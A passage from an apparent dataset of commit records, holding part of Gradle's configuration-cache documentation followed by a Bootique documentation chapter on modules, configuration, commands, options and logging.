instead:\n\n====\n[.multi-language-sample]\n=====\n.build.gradle\n[source,groovy]\n----\ndef enabled = providers.environmentVariable(\"SOME_ENV_VAR\").forUseAtConfigurationTime().present\n----\n=====\n\n[.multi-language-sample]\n=====\n.build.gradle.kts\n[source,kotlin]\n----\nval enabled = providers.environmentVariable(\"SOME_ENV_VAR\").forUseAtConfigurationTime().isPresent\n----\n=====\n====\n\nIn general, you should avoid reading the value of environment variables at configuration time, to avoid invalidating configuration cache entries when the environment variable value changes.\nInstead, you can connect the `Provider` returned by link:{javadocPath}\/org\/gradle\/api\/provider\/ProviderFactory.html#environmentVariable-java.lang.String-[providers.environmentVariable()] to task properties.\n
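\nAs an illustration of connecting such a provider to a task property (a sketch — the task type, property, and variable names are made up for the example), the variable is then read only at execution time:\n\n[source,groovy]\n----\nabstract class PrintDeployTarget extends DefaultTask {\n\n    \/\/ A declared task input: the variable is read at execution time,\n    \/\/ so a changed value makes the task out-of-date instead of\n    \/\/ invalidating the configuration cache entry.\n    @Input\n    abstract Property<String> getTarget()\n\n    @TaskAction\n    void printTarget() {\n        println \"Deploying to ${target.get()}\"\n    }\n}\n\ntasks.register('printDeployTarget', PrintDeployTarget) {\n    target = providers.environmentVariable('DEPLOY_TARGET').orElse('staging')\n}\n----\n\n[[undeclared_file_read]]\n=== Undeclared reading of files\n\nPlugins and build scripts should not read files directly 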
using the Java, Groovy or Kotlin APIs at configuration time.\nInstead, declare files as potential build inputs using the value supplier APIs.\n\nThis problem is caused by build logic similar to this:\n\n====\n[.multi-language-sample]\n=====\n.build.gradle\n[source,groovy]\n----\ndef config = file(\"some.conf\").text\n----\n=====\n\n[.multi-language-sample]\n=====\n.build.gradle.kts\n[source,kotlin]\n----\nval config = file(\"some.conf\").readText()\n----\n=====\n====\n\nTo fix this problem, read files using link:{javadocPath}\/org\/gradle\/api\/provider\/ProviderFactory.html#fileContents-org.gradle.api.file.RegularFile-[providers.fileContents()] instead (note that `fileContents()` takes a `RegularFile`, not a plain path):\n\n====\n[.multi-language-sample]\n=====\n.build.gradle\n[source,groovy]\n----\ndef config = providers.fileContents(layout.projectDirectory.file(\"some.conf\")).asText.forUseAtConfigurationTime()\n----\n=====\n\n[.multi-language-sample]\n=====\n.build.gradle.kts\n[source,kotlin]\n----\nval config = providers.fileContents(layout.projectDirectory.file(\"some.conf\")).asText.forUseAtConfigurationTime()\n----\n=====\n====\n\nIn general, you should avoid reading files at configuration time, to avoid invalidating configuration cache entries when the file content changes.\nInstead, you can connect the `Provider` returned by link:{javadocPath}\/org\/gradle\/api\/provider\/ProviderFactory.html#fileContents-org.gradle.api.file.RegularFile-[providers.fileContents()] to task properties.\n\n[[not_yet_implemented]]\n== Not yet implemented\n\nSupport for using configuration caching with certain Gradle features is not yet implemented.\nSupport for these features will be added in later Gradle releases.\n\n=== Build scan support\n\nWhen it comes to link:https:\/\/gradle.com\/build-scans\/[build scans], only the `--scan` command line option is supported for now.\n\nThe build scan plugin is currently ignored when applied via an init script or build script, as is any configuration done via the build scan extension (server location, accept license, tags, etc).\nThis means that scans will be published to the public `scans.gradle.com` instance by default.\n\n[[composite_builds]]\n=== Composite builds\n\nWhen using the configuration cache on a <<composite_builds#composite_builds,composite build>> a problem will be reported.\nIf you <<configuration_cache#ignore_problems,ignore problems>> then the included builds will be skipped when reusing the configuration cache.\n\n=== Source dependencies\n\nSupport for link:https:\/\/blog.gradle.org\/introducing-source-dependencies[source dependencies] is not yet implemented.\nWith the configuration cache enabled, no problem will be reported, but the build will fail.\n\n=== Dependency locking\n\n<<dependency_locking#dependency-locking, Locking dependency versions>> isn't supported yet.\nWith the configuration cache enabled, no problem will be reported and dependency locks will be ignored.\n\n=== Dynamic or changing dependencies\n\n<<dynamic_versions#sec:dynamic_versions_and_changing_modules,Dependencies with versions which change over time>> aren't supported yet.\nWith the configuration cache enabled, no problem will be reported and changes to dependencies won't be detected.\n\n=== Filesystem repositories\n\nRepositories on local file systems are not supported yet.\nWith the configuration cache enabled, no problem will be reported and changes to the filesystem in the repositories won't be detected.\n\nThis includes:\n\n* <<declaring_repositories#sec:declaring_custom_repository,Maven or Ivy repositories>> with `file:\/\/` URLs,\n* 
<<declaring_repositories#sub:maven_local,`mavenLocal()`>>,\n* and <<declaring_repositories#sub:flat_dir_resolver,flat directory repositories>>.\n\n[[testkit]]\n== Testing Build Logic with TestKit\n\nThe Gradle TestKit (a.k.a. just TestKit) is a library that aids in testing Gradle plugins and build logic generally.\nFor general guidance on how to use TestKit see the <<test_kit.adoc#test_kit,dedicated chapter>>.\n\nTo enable configuration caching in your tests, you can pass the `--configuration-cache` argument to link:{javadocPath}\/org\/gradle\/testkit\/runner\/GradleRunner.html[GradleRunner] or use one of the other methods described in <<configuration_cache.adoc#enable,Enabling the configuration cache>>.\n\nYou need to run your tasks twice.\nOnce to prime the configuration cache.\nOnce to reuse the configuration cache.\n\n.Testing the configuration cache\n====\ninclude::sample[dir=\"snippets\/configurationCache\/testKit\/groovy\",files=\"src\/test\/groovy\/org\/example\/BuildLogicFunctionalTest.groovy[tags=functional-test-configuration-cache]\"]\ninclude::sample[dir=\"snippets\/configurationCache\/testKit\/kotlin\",files=\"src\/test\/kotlin\/org\/example\/BuildLogicFunctionalTest.kt[tags=functional-test-configuration-cache]\"]\n====\n<1> First run primes the configuration cache.\n<2> Second run reuses the configuration cache.\n<3> Assert that the configuration cache gets reused.\n\nIf problems with the configuration cache are found then Gradle will fail the build reporting the problems, and the test will fail.\n\nWhen gradually improving your plugin or build logic to support the configuration cache it can be useful to temporarily <<configuration_cache.adoc#ignore_problems,ignore problems>> or <<configuration_cache.adoc#max_problems,allow a given number of problems>>.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"517e8504058de4cbbbcca01ab76e109d6e298f6f","subject":"docs: removing obsolete piece of advice","message":"docs: removing obsolete piece of advice\n","repos":"bootique\/bootique,nhl\/bootique,bootique\/bootique","old_file":"bootique-docs\/src\/main\/asciidoc\/bootique-docs\/_chapters\/_02_programming.adoc","new_file":"bootique-docs\/src\/main\/asciidoc\/bootique-docs\/_chapters\/_02_programming.adoc","new_contents":"\/\/ Licensed to ObjectStyle LLC under one\n\/\/ or more contributor license agreements. See the NOTICE file\n\/\/ distributed with this work for additional information\n\/\/ regarding copyright ownership. The ObjectStyle LLC licenses\n\/\/ this file to you under the Apache License, Version 2.0 (the\n\/\/ \"License\"); you may not use this file except in compliance\n\/\/ with the License. You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing,\n\/\/ software distributed under the License is distributed on an\n\/\/ \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n\/\/ KIND, either express or implied. 
See the License for the\n\/\/ specific language governing permissions and limitations\n\/\/ under the License.\n\n== Part II. Programming\n\n=== Modules\n\nBootique apps are made of \"modules\". The framework simply locates all available modules, loads them in the DI environment,\nparses the command line, and then transfers control to a Command (that can originate from any of the modules) that\nmatched the user choice. There's a growing list of modules created by Bootique development team. And you can easily\nwrite your own. In fact, programming in Bootique is primarily about writing Modules.\n\nA module is a Java library that contains some code. What makes it a module is a special Java class that implements\nhttps:\/\/google.github.io\/guice\/api-docs\/latest\/javadoc\/index.html?com\/google\/inject\/Module.html[Guice Module interface].\nThis class defines what \"services\" or other types of objects the module provides (in other words what will be injectable\nby the module users). This is done in a form of \"bindings\", i.e. associations between publicly visible injectable\nservice interfaces and specific implementations:\n\n[source,java]\n----\npublic class MyModule implements Module {\n @Override\n public void configure(Binder binder) {\n binder.bind(MyService.class).to(MyServiceImpl.class);\n }\n}\n----\n\nThere are other flavors of bindings in Guice. Please refer to https:\/\/github.com\/google\/guice\/wiki\/Motivation[Guice documentation]\nfor details. One important form extensively used in Bootique is https:\/\/github.com\/google\/guice\/wiki\/Multibindings[Multibinding].\n\n=== Modules Auto-Loading\n\nModules can be automatically loaded via `Bootique.autoLoadModules()` as long as they are included in your application dependencies. Auto-loading depends on the Java https:\/\/docs.oracle.com\/javase\/8\/docs\/api\/java\/util\/ServiceLoader.html[ServiceLoader mechanism]. To ensure your modules can be auto-loaded do two things. First implement `io.bootique.BQModuleProvider` interface specific to your module:\n\n[source,java]\n----\npublic class MyModuleProvider implements BQModuleProvider {\n @Override\n public Module module() {\n return new MyModule();\n }\n}\n----\n\nAfter that create a file `META-INF\/services\/io.bootique.BQModuleProvider` with the only line being the name of your BQModuleProvider implementor. E.g.:\n\n[source,text]\n----\ncom.foo.MyModuleProvider\n----\n\n`BQModuleProvider` has two more methods that you can optionally implement to help Bootique to make sense of the module being loaded:\n\n[source,java]\n----\npublic class MyModuleProvider implements BQModuleProvider {\n \/\/ ...\n\n \/\/ provides human-readable name of the module\n @Override\n public String name() {\n return \"CustomName\";\n }\n\n \/\/ a collection of modules whose services are overridden by this module\n @Override\n public Collection<Class<? extends Module>> overrides() {\n return Collections.singleton(BQCoreModule.class);\n }\n}\n----\n\nIf in your Module you are planning to redefine any services from the upstream modules, specify those upstream modules in the `overrides()` collection. In practice overrides are rarely needed, and often can be replaced with service decomposition.\n\n=== Configuration and Configurable Factories\n\nBootique Modules obtain their configuration in a form of \"factory objects\". We'll show some examples shortly. 
For now let's focus on the big picture, namely the fact that Bootique app configuration is multi-layered and roughly follows the sequence of \"code - config files (contributed) - config files (CLI) - overrides\". \"Code\" is the default values that are provided in constructors of factory objects. Config files overlay those defaults with their own values. Config files can be either contributed in the code, or specified on the command line. Files are where the bulk of the configuration is usually stored. Finally, config values may be further overridden via Java properties and\/or environment variables.\n\n==== Configuration via YAML Files\n\nThe format of the configuration file can be either JSON or YAML. For simplicity we'll focus on the YAML format, but the two are interchangeable. Here is an example config file:\n\n[source,yaml]\n----\nlog:\n level: warn\n appenders:\n - type: file\n logFormat: '%c{20}: %m%n'\n file: target\/logback\/debug.log\n\njetty:\n context: \/myapp\n connectors:\n - port: 12009\n----\n\nWhile not strictly required, as a rule the top-level keys in the file belong to configuration objects of individual modules. In the example above, the \"log\" subtree configures the `bootique-logback` module, while the \"jetty\" subtree configures `bootique-jetty`. For standard modules refer to module-specific documentation on the structure of the supported configuration (or run your app with the `-H` flag to print the supported config to the console). Here we'll discuss how to build your own configuration-aware module.\n\nBootique allows each Module to read its specific configuration subtree as an object of the type defined in the Module. Very often such an object is written as a factory that contains a bunch of setters for configuration properties, and a factory method to produce some \"service\" that a Module is interested in. Here is an example factory:\n\n[source,java]\n----\npublic class MyFactory {\n\n private int intProperty;\n private String stringProperty;\n\n public void setIntProperty(int i) {\n this.intProperty = i;\n }\n\n public void setStringProperty(String s) {\n this.stringProperty = s;\n }\n\n \/\/ factory method\n public MyService createMyService(SomeOtherService soService) {\n return new MyServiceImpl(soService, intProperty, stringProperty);\n }\n}\n----\n\nThe factory contains configuration property declarations, as well as public setters for these properties. (You may\ncreate getters as well. It is not required, but may be useful for unit tests, etc.) Now let's take a look at the\nModule class:\n\n[source,java]\n----\npublic class MyModule extends ConfigModule {\n\n @Singleton\n @Provides\n public MyService createMyService(\n ConfigurationFactory configFactory,\n SomeOtherService service) {\n\n return config(MyFactory.class, configFactory).createMyService(service);\n }\n}\n----\n\nA sample configuration that will work with our module may look like this:\n\n[source,yaml]\n----\nmy:\n intProperty: 55\n stringProperty: 'Hello, world!'\n----\n\nA few points to note here:\n\n* Subclassing from `ConfigModule` is optional. `ConfigModule` provides a few utilities, such as a shorter \"config\"\nmethod and a default configuration key (\"my\" in this case; see the next bullet).\n* Calling our module \"MyModule\" and extending from `ConfigModule` gives it access to the protected \"configPrefix\"\nproperty that is initialized to the value of \"my\" based on the module class name. 
The naming convention here is to use\nthe Module simple class name without the \"Module\" suffix and converted to lowercase.\n* The `@Provides` annotation is a Guice way of marking a Module method as a \"provider\" for a certain type of injectable\nservice. All its parameters are themselves injectable objects.\n* `ConfigurationFactory` is the class used to bind a subtree of the app YAML configuration to a given Java object\n(in our case - MyFactory). The structure of MyFactory is very simple here, but it can be as complex as needed,\ncontaining nested objects, arrays, maps, etc. Internally Bootique uses the\nhttps:\/\/github.com\/FasterXML\/jackson[Jackson framework] to bind YAML to a Java class, so all the features of Jackson\ncan be used to craft configuration.\n\n==== Configuration File Loading\n\nA config file can be passed to a Bootique app via DI (usually coming from the classpath) or on the command line:\n\n* Contributing a config file via DI:\n+\n[source,java]\n----\nBQCoreModule.extend(binder).addConfig(\"classpath:com\/foo\/default.yml\");\n----\n+\nA primary motivation for this style is to provide application default configuration, with YAML files often embedded in\nthe app and read from the classpath (as suggested by the \"classpath:..\" URL in the example). More than one configuration\ncan be contributed. E.g. individual modules might load their own defaults. Multiple configs are combined in a single\nconfig tree by the runtime. The order in which this combination happens is undefined, so make sure there are no conflicts\nbetween them. If there are, consider replacing multiple conflicting configs with a single config.\n\n* Conditionally contributing a config file via DI. It is possible to make DI configuration inclusion conditional on the\npresence of a certain command line option:\n+\n[source,java]\n----\nOptionMetadata o = OptionMetadata.builder(\"qa\")\n .description(\"when present, uses QA config\")\n .build();\n\nBQCoreModule.extend(binder)\n .addOption(o)\n .mapConfigResource(o.getName(), \"classpath:a\/b\/qa.yml\");\n----\n\n* Specifying a config file on the command line. Each Bootique app supports the `--config` option, which takes a configuration\nfile as a parameter. To specify more than one file, use the `--config` option multiple times. Configurations will be loaded\nand merged together in the order of their appearance on the command line.\n\n* Specifying a single config value via a custom option:\n+\n[source,java]\n----\nOptionMetadata o = OptionMetadata.builder(\"db\")\n .description(\"specifies database URL\")\n .valueOptionalWithDefault(\"jdbc:mysql:\/\/127.0.0.1:3306\/mydb\")\n .build();\n\nBQCoreModule.extend(binder)\n .addOption(o)\n .mapConfigPath(o.getName(), \"jdbc.mydb.url\");\n----\n+\nThis adds a new `--db` option to the app that can be used to set the JDBC URL of a datasource called \"mydb\". If the value is\nnot specified, the default one will be used.\n
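+\nFor example (a sketch; the jar name is illustrative), running\n+\n[source,bash]\n----\n$ java -jar myapp.jar --db=jdbc:mysql:\/\/prod-host:3306\/mydb\n----\n+\nsets `jdbc.mydb.url` to the given URL, while running without `--db` falls back to the default.\n\n==== Configuration via Properties\n\nA YAML file can be thought of as a set of nested properties. E.g. the following config\n\n[source,yaml]\n----\nmy:\n prop1: val1\n prop2: val2\n----\n\ncan be represented as two properties (\"my.prop1\", \"my.prop2\") being assigned some values. Bootique takes advantage of this structural equivalence and allows defining configuration via properties as an alternative (or more frequently - an addition) to YAML. 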
If the same \"key\" is defined in both YAML file and a property, `ConfigurationFactory` would use the value of the property (in other words properties override YAML values).\n\nTo turn a given property into a configuration property, you need to prefix it with \"`bq.`\". This \"namespace\" makes configuration explicit and helps to avoid random naming conflicts with properties otherwise present in the system.\n\nProperties can be provided to Bootique via BQCoreModule extender:\n\n[source,java]\n----\nclass MyModule implements Module {\n public void configure(Binder binder) {\n\n BQCoreModule.extend(binder)\n .setProperty(\"bq.my.prop1\", \"valX\")\n .setProperty(\"bq.my.prop2\", \"valY\");\n }\n}\n----\n\nAlternatively they can be loaded from system properties. E.g.:\n\n[source,bash]\n----\njava -Dbq.my.prop1=valX -Dbq.my.prop2=valY -jar myapp.jar\n----\n\nThough generally this approach is sneered upon, as the authors of Bootique are striving to make Java apps look minimally \"weird\" in deployment, and \"-D\" is one of those unintuitive \"Java-only\" things. Often a better alternative is to define the bulk of configuration in YAML, and pass values for a few environment-specific properties via shell variables (see the next section) or bind them to CLI flags.\n\n==== Configuration via Environment Variables\n\nBootique allows to use _environment variables_ to specify\/override configuration values. While variables work similar to JVM properties, using them has advantages in certain situations:\n\n* They may be used to configure credentials, as unlike YAML they won't end up in version control, and unlike Java properties, they won't be visible in the process list.\n* They provide customized application environment without changing the launch script and are ideal for containerized and other virtual environments.\n* They are more user-friendly and appear in the app help.\n\nTo declare variables associated with configuration values, use the following API (notice that no \"bq.\" prefix is necessary here to identify the configuration value):\n\n[source,java]\n----\nclass MyModule implements Module {\n public void configure(Binder binder) {\n\n BQCoreModule.extend(binder)\n .declareVar(\"my.prop1\", \"P1\")\n .declareVar(\"my.prop2\", \"P2\");\n }\n}\n----\n\nSo now a person running the app may set the above configuration as\n\n[source,bash]\n----\nexport P1=valX\nexport P2=valY\n----\n\nMoreover, explicitly declared vars will automatically appear in the application help, assisting the admins in configuring your app\n\n_(TODO: document BQConfig and BQConfigProperty config factory annotations required for the help generation to work)_\n\n[source,bash]\n----\n$ java -jar myapp-1.0.jar --help\n...\nENVIRONMENT\n P1\n Sets value of some property.\n\n P2\n Sets value of some other property.\n----\n\n==== Polymorphic Configuration Objects\n\nA powerful feature of Jackson is the ability to dynamically create subclasses of the configuration objects. Bootique takes full advantage of this. E.g. imagine a logging module that needs \"appenders\" to output its log messages (file appender, console appender, syslog appender, etc.). The framework might not be aware of all possible appenders its users might come up with in the future. Yet it still wants to have the ability to instantiate any of them, based solely on the data coming from YAML. Moreover each appender will have its own set of incompatible configuration properties. 
In fact, this is exactly the situation with the `bootique-logback` module.\n\nHere is how you ensure that such a polymorphic configuration is possible. Let's start with a simple class hierarchy:\n\n[source,java]\n----\npublic abstract class BaseType {\n \/\/ ...\n}\n\npublic class ConcreteType1 extends BaseType {\n \/\/ ...\n}\n\npublic class ConcreteType2 extends BaseType {\n \/\/ ...\n}\n----\n\nNow let's create a matching set of factories to create one of the concrete subtypes of `BaseType`. Let's use Jackson annotations to link\nspecific types to the symbolic names used in the YAML below:\n\n[source,java]\n----\n@JsonTypeInfo(use = JsonTypeInfo.Id.NAME,\n property = \"type\",\n defaultImpl = ConcreteTypeFactory1.class)\npublic abstract class BaseTypeFactory implements PolymorphicConfiguration {\n\n public abstract BaseType create();\n}\n\n@JsonTypeName(\"type1\")\npublic class ConcreteTypeFactory1 extends BaseTypeFactory {\n\n @Override\n public BaseType create() {\n return new ConcreteType1();\n }\n}\n\n@JsonTypeName(\"type2\")\npublic class ConcreteTypeFactory2 extends BaseTypeFactory {\n\n @Override\n public BaseType create() {\n return new ConcreteType2();\n }\n}\n----\n\nAfter that we need to create a service provider file called `META-INF\/services\/io.bootique.config.PolymorphicConfiguration` where all the types participating in the hierarchy are listed (including the supertype):\n\n[source,text]\n----\ncom.foo.BaseTypeFactory\ncom.foo.ConcreteTypeFactory1\ncom.foo.ConcreteTypeFactory2\n----\n\nThis should be enough to work with configuration like this:\n\n[source,yaml]\n----\nmy:\n type: type2\n someVar: someVal\n----\n
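\nNote that because `defaultImpl` above points at `ConcreteTypeFactory1`, a config that omits the `type` key should fall back to \"type1\" (a small illustration added here, using the same hypothetical names as above):\n\n[source,yaml]\n----\nmy:\n someVar: someVal\n----\n\nThe service of `BaseType` is bound in Guice using the standard `ConfigurationFactory` approach described above. Depending on the YAML config,\none of the subclasses of `BaseType` will be created:\n\n[source,java]\n----\n@Provides\npublic BaseType provideBaseType(ConfigurationFactory configFactory) {\n\n return configFactory\n .config(BaseTypeFactory.class, \"my\")\n .create();\n}\n----\n\nIf another module decides to create yet another subclass of BaseType, it will need to create its own `META-INF\/services\/io.bootique.config.PolymorphicConfiguration` file and add a new factory name there.\n\n=== Using Modules\n\nModules can use other \"upstream\" modules in a few ways:\n\n* \"Import\": a downstream module uses another module as a library, ignoring its injectable services.\n* \"Use\": a downstream module's classes inject classes from an upstream module.\n* \"Contribute\": a downstream module injects objects to collections and maps defined in upstream modules.\n\nThe \"Import\" case is trivial, so we'll concentrate on the two remaining scenarios. We will use https:\/\/github.com\/bootique\/bootique\/blob\/master\/bootique\/src\/main\/java\/io\/bootique\/BQCoreModule.java[BQCoreModule] as an example of an upstream module, as it is available in all apps.\n\n==== Injecting Other Module's Services\n\nYou can inject any services declared in other modules. E.g. BQCoreModule provides a number of objects and services that can be accessed via injection:\n\n[source,java]\n----\nclass MyService {\n\n @Args\n @Inject\n private String[] args;\n\n public String getArgsString() {\n return Arrays.asList(args).stream().collect(joining(\" \"));\n }\n}\n----\n\nIn this example we injected command line arguments that were used to start the app. 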
Note that since there can potentially be more than one `String[]` in a DI container, the Bootique `@Args` annotation is used to uniquely identify the array that we want here.\n\n==== Contributing to Other Modules\n\nGuice supports https:\/\/github.com\/google\/guice\/wiki\/Multibindings[multibindings], intended to _contribute_ objects defined in a downstream module to collections\/maps used by services in upstream modules. Bootique hides Guice API complexities, usually providing \"extenders\" in each module. E.g. the following code adds `MyCommand` to the app's set of commands:\n\n[source,java]\n----\npublic class MyModule implements Module {\n\n @Override\n public void configure(Binder binder) {\n BQCoreModule.extend(binder).addCommand(MyCommand.class);\n }\n}\n----\n\nHere we obtained an extender instance via a static method on BQCoreModule. Most standard modules define their own extenders accessible via `\"extend(Binder)\"`. This is a pattern you might want to follow in your own modules.\n\n=== Application Class\n\nA class that contains the `\"main()\"` method is informally called \"application\". Bootique does not impose any additional requirements on this class. You decide what to put in it. It can be limited to just `\"main()\"`, or turned into a REST API resource, etc.\n\n==== Application as a Module\n\nMore often than not, though, it makes sense to turn the application class into a Module. After all, a Bootique app is just a collection of Modules, and this way the application class would represent that one final Module to rule them all:\n\n[source,java]\n----\npublic class Application implements Module {\n\n public static void main(String[] args) {\n Bootique.app(args).module(Application.class).autoLoadModules().exec().exit();\n }\n\n public void configure(Binder binder) {\n \/\/ load app-specific services; redefine standard ones\n }\n}\n----\n\nYou may also implement a separate BQModuleProvider for the Application module. Then `autoLoadModules()` will discover it just like any other Module, and there won't be a need to add the Application module explicitly.\n\n==== Common Main Class\n\nIf all your code is packaged in auto-loadable modules (which is always a good idea), you may not even need a custom main class. The `io.bootique.Bootique` class itself declares a `main()` method and can be used as an app launcher. This creates some interesting possibilities. E.g. you can create Java projects that have no code of their own and are simply collections of modules declared as compile dependencies. More details on packaging are given in the \"Runnable Jar\" chapter.\n
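\nFor instance (a sketch — the jar name and its module contents are hypothetical), such an app could be launched with `io.bootique.Bootique` as the entry point:\n\n[source,bash]\n----\n$ java -cp myapp-all.jar io.bootique.Bootique --help\n----\n\n=== Commands\n\nThe Bootique runtime contains a set of commands coming from Bootique core and from all the modules currently in effect in the app. On startup Bootique attempts to map command-line arguments to a single command type. If no match is found, a _default_ command is executed (which is normally a \"help\" command). To list all available commands, the app can be run with the `--help` option (in most cases running without any options will have the same effect). 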
E.g.:\n\n[source,bash]\n----\n$ java -jar myapp-1.0.jar --help\n\nNAME\n com.foo.MyApp\n\nOPTIONS\n -c yaml_location, --config=yaml_location\n Specifies YAML config location, which can be a file path or a URL.\n\n -h, --help\n Prints this message.\n\n -H, --help-config\n Prints information about application modules and their configuration\n options.\n\n -s, --server\n Starts Jetty server.\n\n----\n\n==== Writing Commands\n\nThe most common commands are already available in various standard modules, but you will often need to write your own. To do that, first create a command class. It should implement the `io.bootique.command.Command` interface, though it is usually more practical to extend `io.bootique.command.CommandWithMetadata` and provide some metadata used in help and elsewhere:\n\n[source,java]\n----\npublic class MyCommand extends CommandWithMetadata {\n\n private static CommandMetadata createMetadata() {\n return CommandMetadata.builder(MyCommand.class)\n .description(\"My command does something important.\")\n .build();\n }\n\n public MyCommand() {\n super(createMetadata());\n }\n\n @Override\n public CommandOutcome run(Cli cli) {\n\n \/\/ ... run the command here....\n\n return CommandOutcome.succeeded();\n }\n}\n----\n\nThe command initializes its metadata in the constructor and implements the \"run\" method to run its code. The returned `CommandOutcome` object instructs Bootique what to do when the command finishes. The object contains the desired system exit code, and exceptions that occurred during execution. To make the new command available to Bootique, add it to `BQCoreModule`'s extender, as was already shown above:\n\n[source,java]\n----\npublic class MyModule implements Module {\n\n @Override\n public void configure(Binder binder) {\n BQCoreModule.extend(binder).addCommand(MyCommand.class);\n }\n}\n----\n\nTo implement a \"daemon\" command running forever until it receives an OS signal (e.g. a web server waiting for user requests), do something like this:\n\n[source,java]\n----\n@Override\npublic CommandOutcome run(Cli cli) {\n\n \/\/ ... start some process in a different thread ....\n\n \/\/ now wait till the app is stopped from another thread\n \/\/ or the JVM is terminated\n try {\n Thread.currentThread().join();\n } catch (InterruptedException e) {\n \/\/ ignore exception or log if needed\n }\n\n return CommandOutcome.succeeded();\n}\n----\n\n==== Injection in Commands\n\nCommands can inject services, just like most other classes in Bootique. There are some specifics though. Since commands are sometimes instantiated, but not executed (e.g. when `--help` is run to list all commands), it is often desirable to avoid immediate instantiation of all dependencies of a given command. So a common pattern with commands is to inject a Guice `Provider` instead of a direct dependency (note that `run` must still return a `CommandOutcome`):\n\n[source,java]\n----\n@Inject\nprivate Provider<SomeService> provider;\n\n@Override\npublic CommandOutcome run(Cli cli) {\n provider.get().someMethod();\n return CommandOutcome.succeeded();\n}\n----\n\n==== Decorating Commands\n\nEach command typically does a single well-defined thing, such as starting a web server, executing a job, etc. But very often in addition to that main thing you need to do other things. E.g. 
when a web server is started, you might also want to run a few more commands:\n\n* Before starting the server, run a health check to verify that any external services the app might depend upon are alive.\n* Start a job scheduler in the background.\n* Start a monitoring \"heartbeat\" thread.\n\nTo run all these \"secondary\" commands when the main command is invoked, Bootique provides command decorator API. First you create a decorator policy object that specifies one or more secondary commands and their invocation strategy (either _before_ the main command, or _in parallel_ with it). Second you \"decorate\" the main command with that policy:\n\n[source,java]\n----\nCommandDecorator extraCommands = CommandDecorator\n .beforeRun(CustomHealthcheckCommand.class)\n .alsoRun(ScheduleCommand.class)\n .alsoRun(HeartbeatCommand.class);\n\nBQCoreModule.extend(binder).decorateCommand(ServerCommand.class, extraCommands);\n----\n\nBased on the specified policy Bootique figures out the sequence of execution and runs the main and the secondary commands.\n\n=== Options\n\n==== Simple Options\n\nIn addition to commands, the app can define \"options\". Options are not associated with any runnable java code, and simply pass command-line values to commands and services. E.g. the standard \"`--config`\" option is used by `CliConfigurationSource` service to locate configuration file. Unrecognized options cause application startup errors. To be recognized, options need to be \"contributed\" to Bootique similar to commands:\n\n[source,java]\n----\nOptionMetadata option = OptionMetadata\n .builder(\"email\", \"An admin email address\")\n .valueRequired(\"email_address\")\n .build();\n\nBQCoreModule.extend(binder).addOption(option);\n----\n\nTo read a value of the option, a service should inject `io.bootique.cli.Cli` object (commands also get this object as a parameter to \"run\") :\n\n[source,java]\n----\n@Inject\nprivate Cli cli;\n\npublic void doSomething() {\n Collection<String> emails = cli.optionStrings(\"email\");\n \/\/ do something with option values....\n}\n----\n\n==== Configuration Options\n\nWhile you can process your own options as described above, options often are just aliases to enable certain pieces of configuration. Bootique supports three flavors of associating options with configuration. Let's demonstrate them here.\n\n. Option value sets a config property:\n+\n[source,java]\n----\n\/\/ Starting the app with \"--my-opt=x\" will set \"jobs.myjob.param\" value to \"x\"\nBQCoreModule.extend(binder)\n .addOption(OptionMetaData.builder(\"my-opt\").build())\n .mapConfigPath(\"my-opt\", \"jobs.myjob.param\");\n----\n. Option presence sets a property to a predefined value:\n+\n[source,java]\n----\n\/\/ Starting the app with \"--my-opt\" will set \"jobs.myjob.param\" value to \"y\"\nBQCoreModule.extend(binder)\n .addOption(OptionMetaData.builder(\"my-opt\").valueOptionalWithDefault(\"y\").build())\n .mapConfigPath(\"my-opt\", \"jobs.myjob.param\");\n----\n. Option presence loads a config resource, such as a YAML file:\n+\n[source,java]\n----\n\/\/ Starting the app with \"--my-opt\" is equivalent to starting with \"--config=classpath:xyz.yml\"\nBQCoreModule.extend(binder)\n .addOption(OptionMetaData.builder(\"my-opt\").build())\n .mapConfigResource(\"my-opt\", \"classpath:xyz.yml\");\n----\n\nThe order of config-bound options on the command line is significant, just as the order of \"`--config`\" parameters. 
Bootique merges configuration associated with options from left to right, overriding any preceding configuration if there is an overlap.\n\n=== Logging\n\n==== Loggers in the Code\n\nStandard Bootique modules use http:\/\/www.slf4j.org\/[SLF4J] internally, as it is the most convenient least common denominator framework, and can be easily bridged to other logging implementations. Your apps or modules are not required to use SLF4J, though if they do, it will likely reduce the amount of bridging needed to route all logs to a single destination.\n\n==== Configurable Logging with Logback\n\nFor better control over logging, a standard module called `bootique-logback` is available that integrates the http:\/\/logback.qos.ch\/[Logback framework] into the app. It seamlessly bridges SLF4J (so you keep using SLF4J in the code), and allows configuring logging via the YAML config file, including appenders (file, console, etc.) and per class\/package log levels. Just like any other module, `bootique-logback` can be enabled by simply adding it to the pom.xml dependencies, assuming `autoLoadModules()` is in effect:\n\n[source,xml]\n----\n<dependency>\n <groupId>io.bootique.logback<\/groupId>\n <artifactId>bootique-logback<\/artifactId>\n<\/dependency>\n----\n\nSee the `bootique-logback` module http:\/\/bootique.io\/docs\/0\/bootique-logback-docs\/[documentation] for further details.\n\n==== BootLogger\n\nTo perform logging during startup, before the DI environment is available and YAML configuration is processed, Bootique uses a special service called `BootLogger` that is not dependent on SLF4J and is not automatically bridged to Logback. It provides an abstraction for writing to stdout \/ stderr, as well as conditional \"trace\" logs sent to stderr. To enable Bootique trace logs, start the app with `-Dbq.trace` as described in the deployment section.\n\nBootLogger is injectable, in case your own code needs to use it. If the default BootLogger behavior is not satisfactory, it can be overridden right in the `main(..)` method, as unlike other services, you may need to change it before DI is available:\n\n[source,java]\n----\npublic class Application {\n public static void main(String[] args) {\n Bootique.app(args).bootLogger(new MyBootLogger()).run();\n }\n}\n----\n","old_contents":"\/\/ Licensed to ObjectStyle LLC under one\n\/\/ or more contributor license agreements. See the NOTICE file\n\/\/ distributed with this work for additional information\n\/\/ regarding copyright ownership. The ObjectStyle LLC licenses\n\/\/ this file to you under the Apache License, Version 2.0 (the\n\/\/ \"License\"); you may not use this file except in compliance\n\/\/ with the License. You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing,\n\/\/ software distributed under the License is distributed on an\n\/\/ \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n\/\/ KIND, either express or implied. See the License for 